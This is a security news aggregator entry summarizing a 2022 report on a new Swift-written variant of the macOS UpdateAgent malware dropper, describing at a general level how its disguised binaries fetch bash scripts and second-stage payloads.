Security News > 2022 > May > UpdateAgent Returns with New macOS Malware Dropper Written in Swift
A new variant of the macOS malware tracked as UpdateAgent has been spotted in the wild, indicating ongoing attempts on the part of its authors to upgrade its functionalities.
UpdateAgent, first detected in late 2020, has since evolved into a malware dropper, facilitating the distribution of second-stage payloads such as adware while also bypassing macOS Gatekeeper protections.
The newly discovered Swift-based dropper masquerades as Mach-O binaries named "PDFCreator" and "ActiveDirectory" that, upon execution, establish a connection to a remote server and retrieve a bash script to be executed.
"The primary difference is that it reaches out to a different URL from which it should load a bash script," the researchers noted.
These bash scripts, named "Activedirec.sh" or "Bash qolveevgclr.sh", include a URL pointing to Amazon S3 buckets to download and run a second-stage disk image file to the compromised endpoint.
"The continued development of this malware shows that its authors continue to remain active, trying to reach as many users as possible," the researchers said.
News URL
https://thehackernews.com/2022/05/updateagent-returns-with-new-macos.html
Related news
- macOS HM Surf vuln might already be under exploit by major malware family (source)
- North Korean Hackers Target Crypto Firms with Hidden Risk Malware on macOS (source)
- North Korean hackers use new macOS malware against crypto firms (source)
- North Korean Hackers Target macOS Using Flutter-Embedded Malware (source)
- New RustyAttr Malware Targets macOS Through Extended Attribute Abuse (source)